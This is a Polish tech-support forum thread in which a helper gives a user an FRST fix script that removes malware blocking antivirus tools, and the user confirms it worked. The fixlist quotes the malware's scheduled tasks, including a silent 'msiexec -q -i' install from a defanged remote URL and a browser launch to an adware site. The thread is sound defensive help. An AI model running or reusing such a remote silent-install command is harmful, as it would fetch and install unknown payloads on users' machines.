Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wirus blokuje malwarebytes, antywirusa

stacowsky 04 Lis 2018 09:04 87 6
  • #1 04 Lis 2018 09:04
    stacowsky
    Poziom 2  

    Witam,
    Od wczoraj w komputerze siedzi mi jakiś wirus, który uniemożliwia pobranie jakiegokolwiek antywirusa. Przy samym wpisaniu np. malwarebytes w google blokuje on przeglądarkę, po restarcie przeglądarki pracuje normalnie. Pobrałem program z innego komputera, przeniosłem z pendriva i również blokuje jego instalację. W menadżerze zadań widnieje kilka procesów które nie mają nazwy, myślę, że to może mieć coś wspólnego z nim. Forum przeszukane, różnymi sposobami próbowałem atakować - nic nie pomaga. W oczy rzuciła mi się data 12.04.2018, gdzieś była mowa, że ta data ma związek z jakimś wirusem. Domyślnie na PC zainstalowany Windows Defender, on nic nie znalazł.
    Poniżej wklejam logi, proszę o pomoc.

    Pozdrawiam

    0 6
  • #2 04 Lis 2018 09:11
    Kolobos
    Spec od komputerów

    Wymagane sa logi z FRST, a nie z przestarzalego OTL, chyba widzisz w innych watkach, ze nikt nie zamieszcza logow z OTL.

    0
  • #3 04 Lis 2018 09:22
    stacowsky
    Poziom 2  

    Widzę, ale uruchomienie FRST jak i pobranie również blokowało, z OTL nie było problemu. Po restarcie udało się pobrać, podsyłam w załączniku.

    0
  • #4 04 Lis 2018 09:27
    Kolobos
    Spec od komputerów

    Brakuje jeszcze addition.txt

    0
  • Pomocny post
    #6 04 Lis 2018 09:34
    Kolobos
    Spec od komputerów

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    Task: {052E6D8D-0BF1-4507-B8CF-00C3226AE189} - System32\Tasks\{12840A34-28CF-8A10-5268-68D81168A704} => "C:\Program Files\Mozilla Firefox\firefox.exe" hxxp://browser-net.org/cl/?guid=vcvou5jgixa6mvarnb3e75ezj1ylvg7g&prid=1&pid=4_1324_0
    C:\Program Files (x86)\jIOtFuH.exe
    Task: {8B4433C9-E4D4-43C5-8B9C-833BCC0C86B4} - System32\Tasks\{F2C265D9-1A17-E80A-E173-F1D2FFC8BBD7} => C:\Program Files (x86)\jIOtFuH.exe <==== UWAGA
    Task: {FA1EFFA6-C6A6-4E02-B83A-159EB87F47FD} - System32\Tasks\{BFE88ACC-C78E-1F93-CE80-A455442523EF} => "msiexec" -q -i hxxps://eryseefor.info/ngqe13kwg30f.aaf
    HKU\S-1-5-21-1705183906-4128513395-1646480543-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <==== UWAGA
    CHR HomePage: Default -> hxxp://home.sweetim.com/?barid={A397007F-0DF5-11E1-B0AA-001E33B81A18}
    S3 EverestDriver; \??\C:\Users\Stachu\AppData\Local\Temp\EverestDriver.sys [X] <==== UWAGA
    2018-11-02 22:07 - 2018-11-02 22:07 - 000003884 _____ C:\Windows\System32\Tasks\{12840A34-28CF-8A10-5268-68D81168A704}
    2018-11-02 22:07 - 2018-11-02 22:07 - 000003786 _____ C:\Windows\System32\Tasks\{F2C265D9-1A17-E80A-E173-F1D2FFC8BBD7}
    2018-11-02 22:07 - 2018-11-02 22:07 - 000003520 _____ C:\Windows\System32\Tasks\{BFE88ACC-C78E-1F93-CE80-A455442523EF}
    2018-11-02 22:07 - 2018-11-02 22:07 - 000000002 _____ C:\Users\Stachu\AppData\Local\imw.ini
    2018-04-12 00:34 - 2018-04-12 00:34 - 000059904 ____N (Microsoft Corporation) C:\Users\Stachu\AppData\Roaming\pCUEziYBdLo.exe
    2018-04-12 00:34 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Users\Stachu\AppData\Roaming\ujduwrAqU.exe
    2018-11-02 22:07 - 2018-11-02 22:07 - 000000002 _____ () C:\Users\Stachu\AppData\Local\imw.ini

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #7 04 Lis 2018 09:44
    stacowsky
    Poziom 2  

    Wychodzi na to, że pomogło. Dziękuję

    0